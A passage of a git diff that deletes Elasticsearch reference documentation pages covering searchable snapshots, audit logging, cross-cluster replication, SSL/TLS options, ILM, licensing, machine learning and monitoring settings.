{ilm-init}. The -<> action automatically converts -an index to a {search-snap} when it reaches the `cold` phase. You can also make -indices in existing snapshots searchable by manually mounting them as -{search-snaps} with the <> API. - -To mount an index from a snapshot that contains multiple indices, we recommend -creating a <> of the snapshot that contains only the -index you want to search, and mounting the clone. You cannot delete a snapshot -if it has any mounted indices, so creating a clone enables you to manage the -lifecycle of the backup snapshot independently of any {search-snaps}. - -You can control the allocation of the shards of {search-snap} indices using the -same mechanisms as for regular indices. For example, you could use -<> to restrict {search-snap} shards to a subset of -your nodes. - -We recommend that you <> indices to a single -segment per shard before taking a snapshot that will be mounted as a -{search-snap} index. Each read from a snapshot repository takes time and costs -money, and the fewer segments there are the fewer reads are needed to restore -the snapshot. - -[TIP] -==== -{search-snaps-cap} are ideal for managing a large archive of historical data. -Historical information is typically searched less frequently than recent data -and therefore may not need replicas for their performance benefits. - -For more complex or time-consuming searches, you can use <> with -{search-snaps}. -==== - -[discrete] -[[how-searchable-snapshots-work]] -=== How {search-snaps} work - -When an index is mounted from a snapshot, {es} allocates its shards to data -nodes within the cluster. The data nodes then automatically restore the shard -data from the repository onto local storage. Once the restore process -completes, these shards respond to searches using the data held in local -storage and do not need to access the repository. This avoids incurring the -cost or performance penalty associated with reading data from the repository. - -If a node holding one of these shards fails, {es} automatically allocates it to -another node, and that node restores the shard data from the repository. No -replicas are needed, and no complicated monitoring or orchestration is -necessary to restore lost shards. - -{es} restores {search-snap} shards in the background and you can search them -even if they have not been fully restored. If a search hits a {search-snap} -shard before it has been fully restored, {es} eagerly retrieves the data needed -for the search. If a shard is freshly allocated to a node and still warming up, -some searches will be slower. However, searches typically access a very small -fraction of the total shard data so the performance penalty is typically small. - -Replicas of {search-snaps} shards are restored by copying data from the -snapshot repository. In contrast, replicas of regular indices are restored by -copying data from the primary. diff --git a/docs/reference/settings/audit-settings.asciidoc b/docs/reference/settings/audit-settings.asciidoc deleted file mode 100644 index 72241f683e3..00000000000 --- a/docs/reference/settings/audit-settings.asciidoc +++ /dev/null @@ -1,153 +0,0 @@ -[role="xpack"] -[[auditing-settings]] -=== Auditing security settings -++++ -Auditing settings -++++ - -[[auditing-settings-description]] -You can use <> to record security-related -events, such as authentication failures, refused connections, and data-access -events. - -If configured, auditing settings must be set on every node in the cluster. -Static settings, such as `xpack.security.audit.enabled`, must be configured in -`elasticsearch.yml` on each node. For dynamic auditing settings, use the -<> to ensure the setting is -the same on all nodes. - -[[general-audit-settings]] -==== General Auditing Settings -[[xpack-security-audit-enabled]] -// tag::xpack-security-audit-enabled-tag[] -`xpack.security.audit.enabled`:: -(<>) -Set to `true` to enable auditing on the node. The default value is `false`. This -puts the auditing events in a dedicated file named `_audit.json` on -each node. -+ -If enabled, this setting must be configured in `elasticsearch.yml` on all nodes -in the cluster. -// end::xpack-security-audit-enabled-tag[] - -[[event-audit-settings]] -==== Audited Event Settings - -The events and some other information about what gets logged can be controlled -by using the following settings: - -[[xpack-sa-lf-events-include]] -// tag::xpack-sa-lf-events-include-tag[] -`xpack.security.audit.logfile.events.include`:: -(<>) -Specifies which events to include in the auditing output. The default value is: -`access_denied, access_granted, anonymous_access_denied, authentication_failed, -connection_denied, tampered_request, run_as_denied, run_as_granted`. -// end::xpack-sa-lf-events-include-tag[] - -[[xpack-sa-lf-events-exclude]] -// tag::xpack-sa-lf-events-exclude-tag[] -`xpack.security.audit.logfile.events.exclude`:: -(<>) -Excludes the specified events from the output. By default, no events are -excluded. -// end::xpack-sa-lf-events-exclude-tag[] - -[[xpack-sa-lf-events-emit-request]] -// tag::xpack-sa-lf-events-emit-request-tag[] -`xpack.security.audit.logfile.events.emit_request_body`:: -(<>) -Specifies whether to include the request body from REST requests on certain -event types such as `authentication_failed`. The default value is `false`. -+ --- -IMPORTANT: No filtering is performed when auditing, so sensitive data may be -audited in plain text when including the request body in audit events. --- - -// end::xpack-sa-lf-events-emit-request-tag[] - -[[node-audit-settings]] -==== Local Node Info Settings - -[[xpack-sa-lf-emit-node-name]] -// tag::xpack-sa-lf-emit-node-name-tag[] -`xpack.security.audit.logfile.emit_node_name`:: -(<>) -Specifies whether to include the <> as a field in -each audit event. The default value is `false`. -// end::xpack-sa-lf-emit-node-name-tag[] - -[[xpack-sa-lf-emit-node-host-address]] -// tag::xpack-sa-lf-emit-node-host-address-tag[] -`xpack.security.audit.logfile.emit_node_host_address`:: -(<>) -Specifies whether to include the node's IP address as a field in each audit event. -The default value is `false`. -// end::xpack-sa-lf-emit-node-host-address-tag[] - -[[xpack-sa-lf-emit-node-host-name]] -// tag::xpack-sa-lf-emit-node-host-name-tag[] -`xpack.security.audit.logfile.emit_node_host_name`:: -(<>) -Specifies whether to include the node's host name as a field in each audit event. -The default value is `false`. -// end::xpack-sa-lf-emit-node-host-name-tag[] - -[[xpack-sa-lf-emit-node-id]] -// tag::xpack-sa-lf-emit-node-id-tag[] -`xpack.security.audit.logfile.emit_node_id`:: -(<>) -Specifies whether to include the node id as a field in each audit event. -This is available for the new format only. That is to say, this information -does not exist in the `_access.log` file. -Unlike <>, whose value might change if the administrator -changes the setting in the config file, the node id will persist across cluster -restarts and the administrator cannot change it. -The default value is `true`. -// end::xpack-sa-lf-emit-node-id-tag[] - -[[audit-event-ignore-policies]] -==== Audit Logfile Event Ignore Policies - -These settings affect the <> -that enable fine-grained control over which audit events are printed to the log file. -All of the settings with the same policy name combine to form a single policy. -If an event matches all of the conditions for a specific policy, it is ignored -and not printed. - -[[xpack-sa-lf-events-ignore-users]] -// tag::xpack-sa-lf-events-ignore-users-tag[] -`xpack.security.audit.logfile.events.ignore_filters..users`:: -(<>) -A list of user names or wildcards. The specified policy will -not print audit events for users matching these values. -// end::xpack-sa-lf-events-ignore-users-tag[] - -[[xpack-sa-lf-events-ignore-realms]] -// tag::xpack-sa-lf-events-ignore-realms-tag[] -`xpack.security.audit.logfile.events.ignore_filters..realms`:: -(<>) -A list of authentication realm names or wildcards. The specified policy will -not print audit events for users in these realms. -// end::xpack-sa-lf-events-ignore-realms-tag[] - -[[xpack-sa-lf-events-ignore-roles]] -// tag::xpack-sa-lf-events-ignore-roles-tag[] -`xpack.security.audit.logfile.events.ignore_filters..roles`:: -(<>) -A list of role names or wildcards. The specified policy will -not print audit events for users that have these roles. If the user has several -roles, some of which are *not* covered by the policy, the policy will -*not* cover this event. -// end::xpack-sa-lf-events-ignore-roles-tag[] - -[[xpack-sa-lf-events-ignore-indices]] -// tag::xpack-sa-lf-events-ignore-indices-tag[] -`xpack.security.audit.logfile.events.ignore_filters..indices`:: -(<>) -A list of index names or wildcards. The specified policy will -not print audit events when all the indices in the event match -these values. If the event concerns several indices, some of which are -*not* covered by the policy, the policy will *not* cover this event. -// end::xpack-sa-lf-events-ignore-indices-tag[] diff --git a/docs/reference/settings/ccr-settings.asciidoc b/docs/reference/settings/ccr-settings.asciidoc deleted file mode 100644 index 8124b7c3672..00000000000 --- a/docs/reference/settings/ccr-settings.asciidoc +++ /dev/null @@ -1,52 +0,0 @@ -[role="xpack"] -[[ccr-settings]] -=== {ccr-cap} settings - -These {ccr} settings can be dynamically updated on a live cluster with the -<>. - -[discrete] -[[ccr-recovery-settings]] -==== Remote recovery settings - -The following setting can be used to rate-limit the data transmitted during -<>: - -`ccr.indices.recovery.max_bytes_per_sec` (<>):: -Limits the total inbound and outbound remote recovery traffic on each node. -Since this limit applies on each node, but there may be many nodes performing -remote recoveries concurrently, the total amount of remote recovery bytes may be -much higher than this limit. If you set this limit too high then there is a risk -that ongoing remote recoveries will consume an excess of bandwidth (or other -resources) which could destabilize the cluster. This setting is used by both the -leader and follower clusters. For example if it is set to `20mb` on a leader, -the leader will only send `20mb/s` to the follower even if the follower is -requesting and can accept `60mb/s`. Defaults to `40mb`. - -[discrete] -[[ccr-advanced-recovery-settings]] -==== Advanced remote recovery settings - -The following _expert_ settings can be set to manage the resources consumed by -remote recoveries: - -`ccr.indices.recovery.max_concurrent_file_chunks` (<>):: -Controls the number of file chunk requests that can be sent in parallel per -recovery. As multiple remote recoveries might already running in parallel, -increasing this expert-level setting might only help in situations where remote -recovery of a single shard is not reaching the total inbound and outbound remote recovery traffic as configured by `ccr.indices.recovery.max_bytes_per_sec`. -Defaults to `5`. The maximum allowed value is `10`. - -`ccr.indices.recovery.chunk_size`(<>):: -Controls the chunk size requested by the follower during file transfer. Defaults to -`1mb`. - -`ccr.indices.recovery.recovery_activity_timeout`(<>):: -Controls the timeout for recovery activity. This timeout primarily applies on -the leader cluster. The leader cluster must open resources in-memory to supply -data to the follower during the recovery process. If the leader does not receive recovery requests from the follower for this period of time, it will close the resources. Defaults to 60 seconds. - -`ccr.indices.recovery.internal_action_timeout` (<>):: -Controls the timeout for individual network requests during the remote recovery -process. An individual action timing out can fail the recovery. Defaults to -60 seconds. diff --git a/docs/reference/settings/common-defs.asciidoc b/docs/reference/settings/common-defs.asciidoc deleted file mode 100644 index ce66eb94b10..00000000000 --- a/docs/reference/settings/common-defs.asciidoc +++ /dev/null @@ -1,182 +0,0 @@ -tag::ssl-certificate[] -Specifies the path for the PEM encoded certificate (or certificate chain) that is -associated with the key. -+ -This setting can be used only if `ssl.key` is set. -end::ssl-certificate[] - -tag::ssl-certificate-authorities[] -List of paths to PEM encoded certificate files that should be trusted. -+ -This setting and `ssl.truststore.path` cannot be used at the same time. -end::ssl-certificate-authorities[] - -tag::ssl-cipher-suites-values[] -Supported cipher suites vary depending on which version of Java you use. For -example, for version 12 the default value is `TLS_AES_256_GCM_SHA384`, -`TLS_AES_128_GCM_SHA256`, `TLS_CHACHA20_POLY1305_SHA256`, -`TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384`, `TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256`, -`TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384`, `TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256`, -`TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256`, `TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256`, -`TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384`, `TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256`, -`TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384`, `TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256`, -`TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA`, `TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA`, -`TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA`, `TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA`, -`TLS_RSA_WITH_AES_256_GCM_SHA384`, `TLS_RSA_WITH_AES_128_GCM_SHA256`, -`TLS_RSA_WITH_AES_256_CBC_SHA256`, `TLS_RSA_WITH_AES_128_CBC_SHA256`, -`TLS_RSA_WITH_AES_256_CBC_SHA`, `TLS_RSA_WITH_AES_128_CBC_SHA`. -+ -For more information, see Oracle's -https://docs.oracle.com/en/java/javase/11/security/oracle-providers.html#GUID-7093246A-31A3-4304-AC5F-5FB6400405E2[Java Cryptography Architecture documentation]. -end::ssl-cipher-suites-values[] - -tag::ssl-cipher-suites-values-java11[] -Supported cipher suites vary depending on which version of Java you use. For -example, for version 11 the default value is `TLS_AES_256_GCM_SHA384`, -`TLS_AES_128_GCM_SHA256`, `TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384`, -`TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256`, `TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384`, -`TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256`, `TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384`, -`TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256`, `TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384`, -`TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256`, `TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA`, -`TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA`, `TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA`, -`TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA`, `TLS_RSA_WITH_AES_256_GCM_SHA384`, -`TLS_RSA_WITH_AES_128_GCM_SHA256`, `TLS_RSA_WITH_AES_256_CBC_SHA256`, -`TLS_RSA_WITH_AES_128_CBC_SHA256`, `TLS_RSA_WITH_AES_256_CBC_SHA`, -`TLS_RSA_WITH_AES_128_CBC_SHA`. -+ --- -NOTE: The default cipher suites list above includes TLSv1.3 ciphers and ciphers -that require the _Java Cryptography Extension (JCE) Unlimited Strength -Jurisdiction Policy Files_ for 256-bit AES encryption. If TLSv1.3 is not -available, the TLSv1.3 ciphers `TLS_AES_256_GCM_SHA384` and -`TLS_AES_128_GCM_SHA256` are not included in the default list. If 256-bit AES is -unavailable, ciphers with `AES_256` in their names are not included in the -default list. Finally, AES GCM has known performance issues in Java versions -prior to 11 and is included in the default list only when using Java 11 or above. - -For more information, see Oracle's -https://docs.oracle.com/en/java/javase/11/security/oracle-providers.html#GUID-7093246A-31A3-4304-AC5F-5FB6400405E2[Java Cryptography Architecture documentation]. --- -end::ssl-cipher-suites-values-java11[] - -tag::ssl-key-pem[] -Path to a PEM encoded file containing the private key. -+ -If HTTP client authentication is required, it uses this file. You cannot use -this setting and `ssl.keystore.path` at the same time. -end::ssl-key-pem[] - -tag::ssl-key-passphrase[] -The passphrase that is used to decrypt the private key. Since the key might not -be encrypted, this value is optional. -+ -You cannot use this setting and `ssl.secure_key_passphrase` at the same time. -end::ssl-key-passphrase[] - -tag::ssl-keystore-key-password[] -The password for the key in the keystore. The default is the keystore password. -+ -You cannot use this setting and `ssl.keystore.secure_password` at the same time. -//TBD: You cannot use this setting and `ssl.keystore.secure_key_password` at the same time. -end::ssl-keystore-key-password[] - -tag::ssl-keystore-password[] -The password for the keystore. -//TBD: You cannot use this setting and `ssl.keystore.secure_password` at the same time. -end::ssl-keystore-password[] - -tag::ssl-keystore-path[] -The path for the keystore file that contains a private key and certificate. -+ -It must be either a Java keystore (jks) or a PKCS#12 file. You cannot use this -setting and `ssl.key` at the same time. -//TBD: It must be either a Java keystore (jks) or a PKCS#12 file. -//TBD: You cannot use this setting and `ssl.key` at the same time. -end::ssl-keystore-path[] - -tag::ssl-keystore-secure-key-password[] -The password for the key in the keystore. The default is the keystore password. -//TBD: You cannot use this setting and `ssl.keystore.key_password` at the same time. -end::ssl-keystore-secure-key-password[] - -tag::ssl-keystore-secure-password[] -The password for the keystore. -//TBD: You cannot use this setting and `ssl.keystore.password` at the same time. -end::ssl-keystore-secure-password[] - -tag::ssl-keystore-type-pkcs12[] -The format of the keystore file. It must be either `jks` or `PKCS12`. If the -keystore path ends in ".p12", ".pfx", or ".pkcs12", this setting defaults -to `PKCS12`. Otherwise, it defaults to `jks`. -end::ssl-keystore-type-pkcs12[] - -tag::ssl-secure-key-passphrase[] -The passphrase that is used to decrypt the private key. Since the key might not -be encrypted, this value is optional. -//TBD: You cannot use this setting and `ssl.key_passphrase` at the same time. -end::ssl-secure-key-passphrase[] - -tag::ssl-supported-protocols[] -Supported protocols with versions. Valid protocols: `SSLv2Hello`, -`SSLv3`, `TLSv1`, `TLSv1.1`, `TLSv1.2`, `TLSv1.3`. If the JVM's SSL provider supports TLSv1.3, -the default is `TLSv1.3,TLSv1.2,TLSv1.1`. Otherwise, the default is -`TLSv1.2,TLSv1.1`. -+ --- -NOTE: If `xpack.security.fips_mode.enabled` is `true`, you cannot use `SSLv2Hello` -or `SSLv3`. See <>. - --- -end::ssl-supported-protocols[] - -tag::ssl-truststore-password[] -The password for the truststore. -+ -You cannot use this setting and `ssl.truststore.secure_password` at the same -time. -//TBD: You cannot use this setting and `ssl.truststore.secure_password` at the same time. -end::ssl-truststore-password[] - -tag::ssl-truststore-path[] -The path for the keystore that contains the certificates to trust. It must be -either a Java keystore (jks) or a PKCS#12 file. -+ -You cannot use this setting and `ssl.certificate_authorities` at the same time. -//TBD: You cannot use this setting and `ssl.certificate_authorities` at the same time. -end::ssl-truststore-path[] - -tag::ssl-truststore-secure-password[] -Password for the truststore. -//TBD: You cannot use this setting and `ssl.truststore.password` at the same time. -end::ssl-truststore-secure-password[] - -tag::ssl-truststore-type[] -The format of the truststore file. It must be either `jks` or `PKCS12`. If the -file name ends in ".p12", ".pfx" or "pkcs12", the default is `PKCS12`. -Otherwise, it defaults to `jks`. -end::ssl-truststore-type[] - -tag::ssl-truststore-type-pkcs11[] -The format of the truststore file. For the Java keystore format, use `jks`. For -PKCS#12 files, use `PKCS12`. For a PKCS#11 token, use `PKCS11`. The default is -`jks`. -end::ssl-truststore-type-pkcs11[] - -tag::ssl-verification-mode-values[] -Controls the verification of certificates. -+ -Valid values are: - - * `full`, which verifies that the provided certificate is signed by a trusted -authority (CA) and also verifies that the server's hostname (or IP address) -matches the names identified within the certificate. - * `certificate`, which verifies that the provided certificate is signed by a -trusted authority (CA), but does not perform any hostname verification. - * `none`, which performs _no verification_ of the server's certificate. This -mode disables many of the security benefits of SSL/TLS and should only be used -after very careful consideration. It is primarily intended as a temporary -diagnostic mechanism when attempting to resolve TLS errors; its use on -production clusters is strongly discouraged. -+ -The default value is `full`. -end::ssl-verification-mode-values[] diff --git a/docs/reference/settings/ilm-settings.asciidoc b/docs/reference/settings/ilm-settings.asciidoc deleted file mode 100644 index 6aa79df9ec1..00000000000 --- a/docs/reference/settings/ilm-settings.asciidoc +++ /dev/null @@ -1,67 +0,0 @@ -[role="xpack"] -[[ilm-settings]] -=== {ilm-cap} settings in {es} -[subs="attributes"] -++++ -{ilm-cap} settings -++++ - -These are the settings available for configuring <> ({ilm-init}). - -==== Cluster level settings - -`xpack.ilm.enabled`:: -(<>, Boolean) -deprecated:[7.8.0,Basic License features are always enabled] + -This deprecated setting has no effect and will be removed in Elasticsearch 8.0. - -`indices.lifecycle.history_index_enabled`:: -(<>, Boolean) -Whether ILM's history index is enabled. If enabled, ILM will record the -history of actions taken as part of ILM policies to the `ilm-history-*` -indices. Defaults to `true`. - -`indices.lifecycle.poll_interval`:: -(<>, <>) -How often {ilm} checks for indices that meet policy criteria. Defaults to `10m`. - -==== Index level settings -These index-level {ilm-init} settings are typically configured through index -templates. For more information, see <>. - -`index.lifecycle.indexing_complete`:: -(<>, Boolean) -Indicates whether or not the index has been rolled over. -Automatically set to `true` when {ilm-init} completes the rollover action. -You can explicitly set it to <>. -Defaults to `false`. - -`index.lifecycle.name`:: -(<>, string) -The name of the policy to use to manage the index. - -[[index-lifecycle-origination-date]] -`index.lifecycle.origination_date`:: -(<>, long) -If specified, this is the timestamp used to calculate the index age for its phase transitions. -Use this setting if you create a new index that contains old data and -want to use the original creation date to calculate the index age. -Specified as a Unix epoch value. - -[[index-lifecycle-parse-origination-date]] -`index.lifecycle.parse_origination_date`:: -(<>, Boolean) -Set to `true` to parse the origination date from the index name. -This origination date is used to calculate the index age for its phase transitions. -The index name must match the pattern `^.*-{date_format}-\\d+`, -where the `date_format` is `yyyy.MM.dd` and the trailing digits are optional. -An index that was rolled over would normally match the full format, -for example `logs-2016.10.31-000002`). -If the index name doesn't match the pattern, index creation fails. - -`index.lifecycle.rollover_alias`:: -(<>, string) -The index alias to update when the index rolls over. Specify when using a -policy that contains a rollover action. When the index rolls over, the alias is -updated to reflect that the index is no longer the write index. For more -information about rolling indices, see <>. diff --git a/docs/reference/settings/images/monitoring-es-cgroup-true.png b/docs/reference/settings/images/monitoring-es-cgroup-true.png deleted file mode 100644 index c8412642db5..00000000000 Binary files a/docs/reference/settings/images/monitoring-es-cgroup-true.png and /dev/null differ diff --git a/docs/reference/settings/license-settings.asciidoc b/docs/reference/settings/license-settings.asciidoc deleted file mode 100644 index de03444768f..00000000000 --- a/docs/reference/settings/license-settings.asciidoc +++ /dev/null @@ -1,17 +0,0 @@ -[role="xpack"] -[[license-settings]] -=== License settings - -You can configure this licensing setting in the `elasticsearch.yml` file. -For more information, see -{kibana-ref}/managing-licenses.html[License management]. - -`xpack.license.self_generated.type`:: -(<>) -Set to `basic` (default) to enable basic {xpack} features. + -+ --- -If set to `trial`, the self-generated license gives access only to all the features -of a x-pack for 30 days. You can later downgrade the cluster to a basic license if -needed. --- diff --git a/docs/reference/settings/ml-settings.asciidoc b/docs/reference/settings/ml-settings.asciidoc deleted file mode 100644 index ae1e00b521a..00000000000 --- a/docs/reference/settings/ml-settings.asciidoc +++ /dev/null @@ -1,176 +0,0 @@ - -[role="xpack"] -[[ml-settings]] -=== Machine learning settings in Elasticsearch -++++ -Machine learning settings -++++ - -[[ml-settings-description]] -// tag::ml-settings-description-tag[] -You do not need to configure any settings to use {ml}. It is enabled by default. - -IMPORTANT: {ml-cap} uses SSE4.2 instructions, so it works only on machines whose -CPUs {wikipedia}/SSE4#Supporting_CPUs[support] SSE4.2. If you run {es} on older -hardware, you must disable {ml} (by setting `xpack.ml.enabled` to `false`). - -// end::ml-settings-description-tag[] - -[discrete] -[[general-ml-settings]] -==== General machine learning settings - -`node.roles: [ ml ]`:: -(<>) Set `node.roles` to contain `ml` to identify -the node as a _{ml} node_ that is capable of running jobs. Every node is a {ml} -node by default. -+ -If you use the `node.roles` setting, then all required roles must be explicitly -set. Consult <> to learn more. -+ -IMPORTANT: On dedicated coordinating nodes or dedicated master nodes, do not set -the `ml` role. - - -`xpack.ml.enabled`:: -(<>) Set to `true` (default) to enable {ml} APIs -on the node. -+ -If set to `false`, the {ml} APIs are disabled on the node. Therefore the node -cannot open jobs, start {dfeeds}, or receive transport (internal) communication -requests related to {ml} APIs. If the node is a coordinating node, {ml} requests -from clients (including {kib}) also fail. For more information about disabling -{ml} in specific {kib} instances, see -{kibana-ref}/ml-settings-kb.html[{kib} {ml} settings]. -+ -IMPORTANT: If you want to use {ml-features} in your cluster, it is recommended -that you set `xpack.ml.enabled` to `true` on all nodes. This is the default -behavior. At a minimum, it must be enabled on all master-eligible nodes. If you -want to use {ml-features} in clients or {kib}, it must also be enabled on all -coordinating nodes. - -`xpack.ml.inference_model.cache_size`:: -(<>) The maximum inference cache size allowed. -The inference cache exists in the JVM heap on each ingest node. The cache -affords faster processing times for the `inference` processor. The value can be -a static byte sized value (i.e. "2gb") or a percentage of total allocated heap. -The default is "40%". See also <>. - -[[xpack-interference-model-ttl]] -// tag::interference-model-ttl-tag[] -`xpack.ml.inference_model.time_to_live` {ess-icon}:: -(<>) The time to live (TTL) for models in the -inference model cache. The TTL is calculated from last access. The `inference` -processor attempts to load the model from cache. If the `inference` processor -does not receive any documents for the duration of the TTL, the referenced model -is flagged for eviction from the cache. If a document is processed later, the -model is again loaded into the cache. Defaults to `5m`. -// end::interference-model-ttl-tag[] - -`xpack.ml.max_inference_processors`:: -(<>) The total number of `inference` type -processors allowed across all ingest pipelines. Once the limit is reached, -adding an `inference` processor to a pipeline is disallowed. Defaults to `50`. - -`xpack.ml.max_machine_memory_percent`:: -(<>) The maximum percentage of the machine's -memory that {ml} may use for running analytics processes. (These processes are -separate to the {es} JVM.) Defaults to `30` percent. The limit is based on the -total memory of the machine, not current free memory. Jobs are not allocated to -a node if doing so would cause the estimated memory use of {ml} jobs to exceed -the limit. - -`xpack.ml.max_model_memory_limit`:: -(<>) The maximum `model_memory_limit` property -value that can be set for any job on this node. If you try to create a job with -a `model_memory_limit` property value that is greater than this setting value, -an error occurs. Existing jobs are not affected when you update this setting. -For more information about the `model_memory_limit` property, see -<>. - -[[xpack.ml.max_open_jobs]] -`xpack.ml.max_open_jobs`:: -(<>) The maximum number of jobs that can run -simultaneously on a node. Defaults to `20`. In this context, jobs include both -{anomaly-jobs} and {dfanalytics-jobs}. The maximum number of jobs is also -constrained by memory usage. Thus if the estimated memory usage of the jobs -would be higher than allowed, fewer jobs will run on a node. Prior to version -7.1, this setting was a per-node non-dynamic setting. It became a cluster-wide -dynamic setting in version 7.1. As a result, changes to its value after node -startup are used only after every node in the cluster is running version 7.1 or -higher. The maximum permitted value is `512`. - -`xpack.ml.nightly_maintenance_requests_per_second`:: -(<>) The rate at which the nightly maintenance task -deletes expired model snapshots and results. The setting is a proxy to the -[requests_per_second](https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-delete-by-query.html#_throttling_delete_requests) -parameter used in the Delete by query requests and controls throttling. -Valid values must be greater than `0.0` or equal to `-1.0` where `-1.0` means a default value -is used. Defaults to `-1.0` - -`xpack.ml.node_concurrent_job_allocations`:: -(<>) The maximum number of jobs that can -concurrently be in the `opening` state on each node. Typically, jobs spend a -small amount of time in this state before they move to `open` state. Jobs that -must restore large models when they are opening spend more time in the `opening` -state. Defaults to `2`. - -[discrete] -[[advanced-ml-settings]] -==== Advanced machine learning settings - -These settings are for advanced use cases; the default values are generally -sufficient: - -`xpack.ml.enable_config_migration`:: -(<>) Reserved. - -`xpack.ml.max_anomaly_records`:: -(<>) The maximum number of records that are -output per bucket. The default value is `500`. - -`xpack.ml.max_lazy_ml_nodes`:: -(<>) The number of lazily spun up {ml} nodes. -Useful in situations where {ml} nodes are not desired until the first {ml} job -opens. It defaults to `0` and has a maximum acceptable value of `3`. If the -current number of {ml} nodes is greater than or equal to this setting, it is -assumed that there are no more lazy nodes available as the desired number -of nodes have already been provisioned. If a job is opened and this setting has -a value greater than zero and there are no nodes that can accept the job, the -job stays in the `OPENING` state until a new {ml} node is added to the cluster -and the job is assigned to run on that node. -+ -IMPORTANT: This setting assumes some external process is capable of adding {ml} -nodes to the cluster. This setting is only useful when used in conjunction with -such an external process. - -`xpack.ml.process_connect_timeout`:: -(<>) The connection timeout for {ml} processes -that run separately from the {es} JVM. Defaults to `10s`. Some {ml} processing -is done by processes that run separately to the {es} JVM. When such processes -are started they must connect to the {es} JVM. If such a process does not -connect within the time period specified by this setting then the process is -assumed to have failed. Defaults to `10s`. The minimum value for this setting is -`5s`. - -[discrete] -[[model-inference-circuit-breaker]] -==== {ml-cap} circuit breaker settings - -`breaker.model_inference.limit`:: -(<>) Limit for the model inference breaker, -which defaults to 50% of the JVM heap. If the parent circuit breaker is less -than 50% of the JVM heap, it is bound to that limit instead. See -<>. - -`breaker.model_inference.overhead`:: -(<>) A constant that all accounting estimations -are multiplied by to determine a final estimation. Defaults to 1. See -<>. - -`breaker.model_inference.type`:: -(<>) The underlying type of the circuit breaker. -There are two valid options: `noop` and `memory`. `noop` means the circuit -breaker does nothing to prevent too much memory usage. `memory` means the -circuit breaker tracks the memory used by inference models and can potentially -break and prevent `OutOfMemory` errors. The default is `memory`. diff --git a/docs/reference/settings/monitoring-settings.asciidoc b/docs/reference/settings/monitoring-settings.asciidoc deleted file mode 100644 index e5df39e2f9c..00000000000 --- a/docs/reference/settings/monitoring-settings.asciidoc +++ /dev/null @@ -1,288 +0,0 @@ -[role="xpack"] -[[monitoring-settings]] -=== Monitoring settings in {es} -++++ -Monitoring settings -++++ - -By default, {es} {monitor-features} are enabled but data collection is disabled. -To enable data collection, use the `xpack.monitoring.collection.enabled` setting. - -Except where noted otherwise, these settings can be dynamically updated on a -live cluster with the <> API. - -To adjust how monitoring data is displayed in the monitoring UI, configure -{kibana-ref}/monitoring-settings-kb.html[`xpack.monitoring` settings] in -`kibana.yml`. To control how monitoring data is collected from {ls}, -configure monitoring settings in `logstash.yml`. - -For more information, see <>. - -[discrete] -[[general-monitoring-settings]] -==== General monitoring settings - -`xpack.monitoring.enabled`:: -deprecated:[7.8.0,Basic License features should always be enabled] -(<>) This deprecated setting has no effect. - -[discrete] -[[monitoring-collection-settings]] -==== Monitoring collection settings - -[[monitoring-settings-description]] -// tag::monitoring-settings-description-tag[] -The `xpack.monitoring.collection` settings control how data is collected from -your {es} nodes. -// end::monitoring-settings-description-tag[] - -`xpack.monitoring.collection.enabled`:: -(<>) Set to `true` to enable the collection of -monitoring data. When this setting is `false` (default), {es} monitoring data is -not collected and all monitoring data from other sources such as {kib}, Beats, -and {ls} is ignored. - -[[xpack-monitoring-collection-interval]] -// tag::monitoring-collection-interval-tag[] -`xpack.monitoring.collection.interval` {ess-icon}:: -deprecated:[6.3.0,"Use `xpack.monitoring.collection.enabled` set to `false` instead."] -(<>) Setting to `-1` to disable data collection -is no longer supported beginning with 7.0.0. -+ -Controls how often data samples are collected. Defaults to `10s`. If you -modify the collection interval, set the `xpack.monitoring.min_interval_seconds` -option in `kibana.yml` to the same value. -// end::monitoring-collection-interval-tag[] - -`xpack.monitoring.elasticsearch.collection.enabled`:: -(<>) Controls whether statistics about your -{es} cluster should be collected. Defaults to `true`. This is different from -`xpack.monitoring.collection.enabled`, which allows you to enable or disable all -monitoring collection. However, this setting simply disables the collection of -{es} data while still allowing other data (e.g., {kib}, {ls}, Beats, or APM -Server monitoring data) to pass through this cluster. - -`xpack.monitoring.collection.cluster.stats.timeout`:: -(<>) Timeout for collecting the cluster -statistics, in <>. Defaults to `10s`. - -`xpack.monitoring.collection.node.stats.timeout`:: -(<>) Timeout for collecting the node statistics, -in <>. Defaults to `10s`. - -`xpack.monitoring.collection.indices`:: -(<>) Controls which indices the -{monitor-features} collect data from. Defaults to all indices. Specify the index -names as a comma-separated list, for example `test1,test2,test3`. Names can -include wildcards, for example `test*`. You can explicitly exclude indices by -prepending `-`. For example `test*,-test3` will monitor all indexes that start -with `test` except for `test3`. System indices like .security* or .kibana* -always start with a `.` and generally should be monitored. Consider adding `.*` -to the list of indices ensure monitoring of system indices. For example: -`.*,test*,-test3` - -`xpack.monitoring.collection.index.stats.timeout`:: -(<>) Timeout for collecting index statistics, -in <>. Defaults to `10s`. - -`xpack.monitoring.collection.index.recovery.active_only`:: -(<>) Controls whether or not all recoveries are -collected. Set to `true` to collect only active recoveries. Defaults to `false`. - -`xpack.monitoring.collection.index.recovery.timeout`:: 